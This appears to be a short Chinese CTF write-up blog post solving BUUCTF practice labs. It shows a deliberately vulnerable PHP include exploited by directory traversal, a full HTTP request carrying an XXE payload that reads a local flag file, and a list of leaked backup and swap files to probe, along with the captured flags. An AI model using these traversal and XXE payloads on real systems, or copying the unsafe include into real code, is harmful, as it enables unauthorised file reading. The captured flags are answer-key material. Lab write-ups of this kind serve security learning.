BUU OTHERS

First Post:

Last Update:

Word Count:
308

Read Time:
1 min

Basic Lab

BUU LFI COURSE 1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/7/9
 * Time: 7:07 AM
 */

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

文件包含漏洞,通过目录穿越获取flag

1
http://17573c3f-a5f5-496e-b281-fb8fa9e48eef.node3.buuoj.cn/?file=../../../flag

flag{18203b8a-a0fc-4379-81e1-96a8c758c464}

Real

[PHP]XXE1

XXE: XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

https://github.com/vulhub/vulhub/blob/master/php/php_xxe

1
https://github.com/vulhub/vulhub/blob/master/php/php_xxe
1
2
libXML support	active
libXML Compiled Version	2.8.0

payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /simplexml_load_string.php HTTP/1.1
Host: node3.buuoj.cn:27468
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/flag.txt" >]>
<root>
<name>&xxe;</name>
</root>

N1book

[第一章 web入门]常见的搜集1]

访问如下敏感文件即可获取flag

1
2
3
robots.txt
index.php~
.index.php.swp

n1book{info_1s_v3ry_imp0rtant_hack}

打赏点小钱
支付宝 | Alipay
微信 | WeChat